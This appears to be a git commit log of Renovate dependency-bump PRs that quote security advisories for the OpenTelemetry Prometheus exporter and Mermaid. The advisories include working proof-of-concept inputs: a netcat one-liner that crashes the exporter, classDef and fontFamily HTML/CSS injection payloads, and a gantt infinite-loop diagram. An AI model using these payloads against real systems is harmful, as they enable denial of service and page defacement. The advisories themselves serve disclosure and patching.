Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c)

###
[`v0.216.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNTkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-12 18:55:30 +08:00
renovate[bot] ac6d0d35af chore: bump up @opentelemetry/exporter-prometheus version to ^0.217.0 [SECURITY] (#14944)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.215.0` →
`^0.217.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.215.0/0.217.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-prometheus/0.217.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-prometheus/0.215.0/0.217.0?slim=true)
|

---

### Prometheus exporter process crash via malformed HTTP request
[CVE-2026-44902](https://nvd.nist.gov/vuln/detail/CVE-2026-44902) /
[GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)

<details>
<summary>More information</summary>

#### Details
##### Summary

A single malformed HTTP request crashes any Node.js process running the
OpenTelemetry JS Prometheus exporter. The metrics endpoint (default
`0.0.0.0:9464`) has no error handling around URL parsing, so a request
with an invalid URI causes an uncaught `TypeError` that terminates the
process.

**You are affected by this vulnerability if either of the following
apply to your application:**

* you directly use `@opentelemetry/exporter-prometheus` in your code
through its built-in server.
* your `OTEL_METRICS_EXPORTER` environment variable includes
`prometheus` **AND**
  * you use `@opentelemetry/sdk-node`
* you use `@opentelemetry/auto-instrumentations-node` via `--require
@&#8203;opentelemetry/auto-instrumentations-node/register`/`--import
@&#8203;opentelemetry/auto-instrumentations-node/register`

##### Impact

**Denial of service.** Any application using the OpenTelemetry
Prometheus exporter’s built-in server can be crashed by a single
unauthenticated network packet sent to the metrics port. No
authentication, special privileges, or prior access is required.

##### Remediation

##### Update to the fixed version

Update `@opentelemetry/exporter-prometheus` and
`@opentelemetry/sdk-node` to version **0.217.0** or later.
Update `@opentelemetry/auto-instrumentations-node` to version **0.75.0**
or later.

This release adds proper error handling around the URL constructor,
returning an HTTP `400` response on parse failure rather than allowing
the exception to propagate and crash the process.

```
npm install @&#8203;opentelemetry/exporter-prometheus@latest
```

##### Do Not Expose the Endpoint to Untrusted Users

> [!IMPORTANT] 
> The following mitigations reduce exposure but do not fully remediate
the vulnerability. Any client that *can* reach the metrics endpoint -
including your own Prometheus scraper host if compromised - could still
trigger the crash. Updating to **0.217.0** is the recommended
resolution.

If updating is not immediately feasible, restrict access to the metrics
endpoint so that it is not reachable by untrusted or unauthenticated
network clients. For example:

* **Bind to localhost only** by setting the `host` option to `127.0.0.1`
when configuring the `PrometheusExporter`, so the port is not exposed on
public or shared network interfaces

* **Use a firewall or network policy** to restrict access to port `9464`
(or whichever port you have configured) to only trusted Prometheus
scrape hosts

* **Place the endpoint behind a reverse proxy** that filters or
validates incoming requests before they reach the exporter

##### Details

In `PrometheusExporter.ts`, the `_requestHandler` calls `new
URL(request.url, this._baseUrl)` without any error handling. Node's HTTP
parser accepts absolute-form URIs (e.g. `http://`) for proxy
compatibility, including malformed ones. When `request.url` is
`"http://"`, the `URL` constructor throws `TypeError: Invalid URL`.
Since there is no try-catch in the handler, the exception propagates as
an uncaught exception and crashes the process.

The Prometheus metrics endpoint is unauthenticated by design (Prometheus
scrapes it) and binds to `0.0.0.0` by default, meaning it is reachable
by any network client that can connect to the metrics port.

##### Proof of Concept

Start any Node.js application with the Prometheus exporter running on
the default port `9464`, then send a single raw TCP packet:

```
echo -ne 'GET http:// HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc localhost 9464
```

The process crashes immediately with:

```
TypeError: Invalid URL
    at new URL (...)
    at PrometheusExporter._requestHandler (...)
```

#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

#### References
-
[https://github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3)
-
[https://github.com/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js
(@&#8203;opentelemetry/exporter-prometheus)</summary>

###
[`v0.217.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c)

###
[`v0.216.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNTkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-12 16:21:10 +08:00
renovate[bot] 6b720206c6 chore: bump up mermaid version to v11.15.0 [SECURITY] (#14946)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [mermaid](https://redirect.github.com/mermaid-js/mermaid) | [`11.13.0`
→ `11.15.0`](https://renovatebot.com/diffs/npm/mermaid/11.13.0/11.15.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/mermaid/11.15.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/mermaid/11.13.0/11.15.0?slim=true)
|

---

### Mermaid: Improper sanitization of `classDef` in state diagrams leads
to HTML injection
[CVE-2026-41149](https://nvd.nist.gov/vuln/detail/CVE-2026-41149) /
[GHSA-ghcm-xqfw-q4vr](https://redirect.github.com/advisories/GHSA-ghcm-xqfw-q4vr)

<details>
<summary>More information</summary>

#### Details
##### Impact

Under the default configuration, Mermaid state diagram's `classDef`
allow DOM injection that escapes the SVG, although `<script>` tags are
removed, preventing XSS.

##### Proof-of-concept

```
stateDiagram-v2
  classDef xss fill:red</style></svg><style>*{x:x;y:y;overflow:visible!important;contain:none!important;transform:none!important;filter:none!important;clip-path:none!important}</style><div style="x:x;y:y;color:red;font:5em/1 monospace;display:grid;place-items:center;z-index:2147483647;width:100vw;height:100vh;position:fixed;top:0;left:0;background:black">HACKED</div><svg><style>a:b
  [*] --> A:::xss
```

##### Patches

-
[v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
(see
[37ff937f1da2e19f882fd1db01235db4d01f4056](https://redirect.github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056))
-
[v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
(see
[4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://redirect.github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3))

##### Workarounds

If you can not update to a patched version, setting [`"securityLevel":
"sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
will prevent this, by rendering the mermaid diagram in a sandboxed
`<iframe>`.

##### Credits

Thanks to @&#8203;zsxsoft from @&#8203;KeenSecurityLab for reporting
this vulnerability.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L`

#### References
-
[https://github.com/mermaid-js/mermaid/security/advisories/GHSA-ghcm-xqfw-q4vr](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-ghcm-xqfw-q4vr)
-
[https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056](https://redirect.github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056)
-
[https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://redirect.github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3)
-
[https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
-
[https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
-
[https://mermaid.js.org/config/schema-docs/config.html#securitylevel](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
-
[https://github.com/advisories/GHSA-ghcm-xqfw-q4vr](https://redirect.github.com/advisories/GHSA-ghcm-xqfw-q4vr)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-ghcm-xqfw-q4vr)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Mermaid: Improper sanitization of `classDefs` in diagrams leads to
CSS injection
[CVE-2026-41148](https://nvd.nist.gov/vuln/detail/CVE-2026-41148) /
[GHSA-xcj9-5m2h-648r](https://redirect.github.com/advisories/GHSA-xcj9-5m2h-648r)

<details>
<summary>More information</summary>

#### Details
##### Details

The state diagram and any other diagram type that routes user-controlled
style strings through createCssStyles parser for Mermaid v11.14.0 and
earlier captures `classDef` values with an unrestricted regex:

```jison
// packages/mermaid/src/diagrams/state/parser/stateDiagram.jison:83
<CLASSDEFID>[^\n]*   { this.popState(); return 'CLASSDEF_STYLEOPTS' }
```

The value passes unsanitized through `addStyleClass()` ->
`createCssStyles()` -> `style.innerHTML` (mermaidAPI.ts:418). A `}` in
the value closes the generated CSS selector, and everything after
becomes a new CSS rule on the page.

##### PoC

```
stateDiagram-v2 
      classDef x }*{ background-image: url("http://media.giphy.com/media/SggILpMXO7Xt6/giphy.gif")}
```

Live demo:

<https://mermaid.live/edit#pako:eNpFjzFvgzAQhf-KdVNbEcBgMHhtlkqtOnSJKi8ONsYKBmRMlRTx3-skanvTfbp7996t0IxSAYPZC6_2Rmgn7O4rQ00v5nmvWnRG29OKjqI5aTcug9wZK7RiaHH9A4fO-4kliVXSiFibqbvEzWjvnHxo_fI6vR3e6cGXyX2qTcvhcYMItDMSmHeLisAqZ8UVYeUDQhx8p6ziwEIrhTtx4MNVM4nhcxztrywE0h2wVvRzoGWS_z_8rahBKvcckntgmN5OAFvhDIzUNCZZQXCR5nVaZkUEF2BVFpOcEkoxxhUuyRbB980yjStapKHqoKFlhvPtB7BFZEU>

##### Patches

This has been patched in:

-
[v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
(see
[e9b0f34d8d82a6260077764ee45e1d7d90957a0f](https://redirect.github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f))
-
[v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
(see
[8fead23c59166b7bab6a39eac81acebee2859102](https://redirect.github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102))

##### Workarounds

Setting [`"securityLevel":
"sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
will prevent this, by rendering the mermaid diagram in a sandboxed
`<iframe>`.

##### Impact

Enables page defacement, user tracking via `url()` callbacks, and DOM
attribute exfiltration via CSS `:has()` selectors.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L`

#### References
-
[https://github.com/mermaid-js/mermaid/security/advisories/GHSA-xcj9-5m2h-648r](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-xcj9-5m2h-648r)
-
[https://github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102](https://redirect.github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102)
-
[https://github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f](https://redirect.github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f)
-
[https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
-
[https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
-
[https://mermaid.js.org/config/schema-docs/config.html#securitylevel](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
-
[https://github.com/advisories/GHSA-xcj9-5m2h-648r](https://redirect.github.com/advisories/GHSA-xcj9-5m2h-648r)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-xcj9-5m2h-648r)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Mermaid: Improper sanitization of configuration leads to CSS
injection
[CVE-2026-41159](https://nvd.nist.gov/vuln/detail/CVE-2026-41159) /
[GHSA-87f9-hvmw-gh4p](https://redirect.github.com/advisories/GHSA-87f9-hvmw-gh4p)

<details>
<summary>More information</summary>

#### Details
##### Impact

Mermaid's default configuration allows injecting CSS that applies
outside of the Mermaid diagram via the `fontFamily`, `themeCSS`, and
`altFontFamily` configuration options.

Live demo:
[mermaid.live](https://mermaid.live/edit#pako:eNpNjktLxDAUhf9KvFBR6JS-60QQfODKlUvJ5k6TtsEmKTHFGUP-u-mI6Nmdy3fOPR56wwVQSBIvtXSUeAaD0e4ZlZxPDChhcLxFfwiEauOuLq_9Afv30ZpVczpaITS5kGox1qF2gfSeBwYhJAnThAyz-ewntI68vG5-0z3Z7e7IA9OQwmglB-rsKlJQwircLPgNZeAmocTPAi4GXGfHgOkQYwvqN2PUbzJuGSegA84f0a0LRyeeJI4W_xChubCPcbQD2pwbgHo4Aq2aKmvbqq3zoiu7pizqFE6RybN9VFfFY1HWXRVS-Dr_zLObrt7_V_gGGXZlGg)

Example code:

```
%%{init: {"fontFamily": "x;a{b} :not(&){background:green !important} c{d}"}}%%
flowchart LR
    A --> B
```

The injected CSS exploits stylis's `&` (scope reference) handling.
`:not(&)` escapes the `#mermaid-xxx` automatic scoping, applying styles
to all page elements. Global at-rules (`@font-face`, `@keyframes`,
`@counter-style`) are also injectable as stylis hoists them to top
level.

This allows page defacement and DOM attribute exfiltration via CSS
`:has()` selectors.

##### Patches

-
[v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
(see
[64769738d5b59211e1decb471ffbaca8afec51aa](https://redirect.github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa))
-
[v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
(see
[a9d9f0d8eb790349121508688cd338253fd80d76](https://redirect.github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76))

##### Workarounds

If you can't upgrade mermaid, you can set the
[`secure`](https://mermaid.js.org/config/schema-docs/config.html#secure)
config value in the mermaid config to avoid allowing diagrams to modify
`fontFamily`, `themeCSS`, `altFontFamily`, and `themeVariables`.

Setting [`"securityLevel":
"sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
will also prevent this.

##### Credits

Reported by @&#8203;zsxsoft on behalf of @&#8203;KeenSecurityLab

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L`

#### References
-
[https://github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p)
-
[https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa](https://redirect.github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa)
-
[https://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76](https://redirect.github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76)
-
[https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
-
[https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
-
[https://github.com/advisories/GHSA-87f9-hvmw-gh4p](https://redirect.github.com/advisories/GHSA-87f9-hvmw-gh4p)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-87f9-hvmw-gh4p)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Mermaid Gantt Charts are vulnerable to an Infinite Loop DoS
[CVE-2026-41150](https://nvd.nist.gov/vuln/detail/CVE-2026-41150) /
[GHSA-6m6c-36f7-fhxh](https://redirect.github.com/advisories/GHSA-6m6c-36f7-fhxh)

<details>
<summary>More information</summary>

#### Details
##### Impact

Mermaid v11.14.0 and earlier are vulnerable to a denial-of-service
attack when rendering gantt charts, if they use the [`excludes`
attribute](https://mermaid.js.org/syntax/gantt.html?#excludes) to
exclude all dates.

Example:

```
gantt
  excludes monday,tuesday,wednesday,thursday,friday,saturday,sunday
  DoS :2025-01-01, 1d
```

`mermaid.parse` is unaffected, unless you then call the
`ganttDb.getTasks()` (which is called when rendering a diagram).

##### Patches

This has been patched in:

-
[v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
(see
[faafb5d49106dd32c367f3882505f2dd625aa30e](https://redirect.github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e))
-
[v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
(see
[a59ea56174712ee5430dfd5bc877cb5151f501a6](https://redirect.github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6))

##### Workarounds

There are no workarounds available without updating to a newer version
of mermaid.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L`

#### References
-
[https://github.com/mermaid-js/mermaid/security/advisories/GHSA-6m6c-36f7-fhxh](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-6m6c-36f7-fhxh)
-
[https://github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6](https://redirect.github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6)
-
[https://github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e](https://redirect.github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e)
-
[https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
-
[https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
-
[https://github.com/advisories/GHSA-6m6c-36f7-fhxh](https://redirect.github.com/advisories/GHSA-6m6c-36f7-fhxh)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-6m6c-36f7-fhxh)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>mermaid-js/mermaid (mermaid)</summary>

###
[`v11.15.0`](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)

[Compare
Source](https://redirect.github.com/mermaid-js/mermaid/compare/mermaid@11.14.0...mermaid@11.15.0)

##### Minor Changes

-
[#&#8203;7174](https://redirect.github.com/mermaid-js/mermaid/pull/7174)
[`0aca217`](https://redirect.github.com/mermaid-js/mermaid/commit/0aca21739c0d1fcaaa206e04a6cd574ebc415483)
Thanks
[@&#8203;milesspencer35](https://redirect.github.com/milesspencer35)! -
feat(sequence): Add support for decimal start and increment values in
the `autonumber` directive

-
[#&#8203;7512](https://redirect.github.com/mermaid-js/mermaid/pull/7512)
[`8e17492`](https://redirect.github.com/mermaid-js/mermaid/commit/8e17492f7365ba50896382feb69a23efd9d8a22d)
Thanks [@&#8203;aruncveli](https://redirect.github.com/aruncveli)! -
feat(flowchart): add datastore shape

In Data flow diagrams, a datastore/warehouse/file/database is used to
represent data persistence. It is denoted by a rectangle with only top
and bottom borders, and can be used in flowcharts with `A@{ shape:
datastore, label: "Datastore" }`.

-
[#&#8203;6440](https://redirect.github.com/mermaid-js/mermaid/pull/6440)
[`9ad8dde`](https://redirect.github.com/mermaid-js/mermaid/commit/9ad8dde6d049adde85d8ed2d476c09b5820f3f4b)
Thanks [@&#8203;yordis](https://redirect.github.com/yordis),
[@&#8203;lgazo](https://redirect.github.com/lgazo)! - feat: add Event
Modeling diagram

-
[#&#8203;7707](https://redirect.github.com/mermaid-js/mermaid/pull/7707)
[`27db774`](https://redirect.github.com/mermaid-js/mermaid/commit/27db774627be1cee881961dfd0d2cb21cd01b79d)
Thanks [@&#8203;txmxthy](https://redirect.github.com/txmxthy)! -
feat(architecture): expose four fcose layout knobs for
`architecture-beta` diagrams (`nodeSeparation`,
`idealEdgeLengthMultiplier`, `edgeElasticity`, `numIter`) so authors can
tune layout density and spread overlapping siblings without changing
diagram source

-
[#&#8203;7604](https://redirect.github.com/mermaid-js/mermaid/pull/7604)
[`bf9502f`](https://redirect.github.com/mermaid-js/mermaid/commit/bf9502fb6012a4b724679b401ac928f5ee55161c)
Thanks [@&#8203;M-a-c](https://redirect.github.com/M-a-c)! -
feat(class): add nested namespace support for class diagrams via dot
notation and syntactic nesting

If you have namespaces in class diagrams that use `.`s already and want
to render them without nesting (≤v11.14.0 behaviour), you can use set
`class.hierarchicalNamespaces=false` in your mermaid config:

  ```yaml
  config:
    class:
      hierarchicalNamespaces: false
  ```

-
[#&#8203;7272](https://redirect.github.com/mermaid-js/mermaid/pull/7272)
[`88cdd3d`](https://redirect.github.com/mermaid-js/mermaid/commit/88cdd3dc0aab9577174561b04e14760c565a232b)
Thanks [@&#8203;xinbenlv](https://redirect.github.com/xinbenlv)! -
feat(sankey): add outlined label style, configurable
nodeWidth/nodePadding, and custom node colors

##### Patch Changes

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`e9b0f34`](https://redirect.github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: prevent unbalanced CSS styles in classDefs

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`37ff937`](https://redirect.github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: create CSS styles using the CSSOM

  This removes some invalid CSS and normalizes some CSS formatting.

-
[#&#8203;7508](https://redirect.github.com/mermaid-js/mermaid/pull/7508)
[`bfe60cc`](https://redirect.github.com/mermaid-js/mermaid/commit/bfe60cc67b9a6dec64f9161f58e4d24a06c42b65)
Thanks [@&#8203;biiab](https://redirect.github.com/biiab)! -
fix(stateDiagram): `end note` now only closes a note when used on a new
line

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`faafb5d`](https://redirect.github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix(gantt): add iteration limit for `excludes` field

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`65f8be2`](https://redirect.github.com/mermaid-js/mermaid/commit/65f8be2a42faf869b811469571983cba7eeeca99)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: disallow some CSS at-rules in custom CSS

-
[#&#8203;7726](https://redirect.github.com/mermaid-js/mermaid/pull/7726)
[`1502f32`](https://redirect.github.com/mermaid-js/mermaid/commit/1502f32f3c5fb944925b0c527fbbde3c4f041824)
Thanks [@&#8203;aloisklink](https://redirect.github.com/aloisklink)! -
fix(wardley): fix unnecessary sanitization of text

-
[#&#8203;7578](https://redirect.github.com/mermaid-js/mermaid/pull/7578)
[`1f98db8`](https://redirect.github.com/mermaid-js/mermaid/commit/1f98db8e326299ac97a2fa60abfd509d8f5f16e2)
Thanks [@&#8203;Gaston202](https://redirect.github.com/Gaston202)! -
fix(class): self-referential class multiplicity labels no longer
rendered multiple times

Fixes
[#&#8203;7560](https://redirect.github.com/mermaid-js/mermaid/issues/7560).
Resolves an issue where cardinality labels on self-referential class
relationships were rendered three times due to edge splitting in the
dagre layout. The fix ensures that each sub-edge only carries its
relevant label positions.

-
[#&#8203;7592](https://redirect.github.com/mermaid-js/mermaid/pull/7592)
[`2343e38`](https://redirect.github.com/mermaid-js/mermaid/commit/2343e38498a3b31f8ce5e79f1f009e0b56fbe086)
Thanks [@&#8203;knsv-bot](https://redirect.github.com/knsv-bot)! -
fix(sequence): add background box behind alt/else section title labels
in sequence diagrams

-
[#&#8203;7589](https://redirect.github.com/mermaid-js/mermaid/pull/7589)
[`7fb9509`](https://redirect.github.com/mermaid-js/mermaid/commit/7fb9509b8b5cb1dc48519dc60cf6cdc6afba0462)
Thanks [@&#8203;NYCU-Chung](https://redirect.github.com/NYCU-Chung)! -
fix(block): prevent column widths from shrinking when mixing different
column spans

-
[#&#8203;7632](https://redirect.github.com/mermaid-js/mermaid/pull/7632)
[`3f9e0f1`](https://redirect.github.com/mermaid-js/mermaid/commit/3f9e0f15bedc1e2c71ddb6b34192d1a21124cfc2)
Thanks [@&#8203;ekiauhce](https://redirect.github.com/ekiauhce)! -
fix(sequence): correct messageAlign label position for right-to-left
arrows in sequence diagrams

-
[#&#8203;7642](https://redirect.github.com/mermaid-js/mermaid/pull/7642)
[`7a8fb85`](https://redirect.github.com/mermaid-js/mermaid/commit/7a8fb8532c57ecc55b3711454ab0e505a4291445)
Thanks [@&#8203;tractorjuice](https://redirect.github.com/tractorjuice)!
- fix(wardley): allow hyphens in unquoted component names

Multi-word names containing hyphens — e.g. `real-time processing`,
`end-user`, `on-call engineer` — now parse without quoting, bringing the
grammar in line with the OnlineWardleyMaps (OWM) convention. `A->B`
(no-space arrow) still tokenises correctly.

-
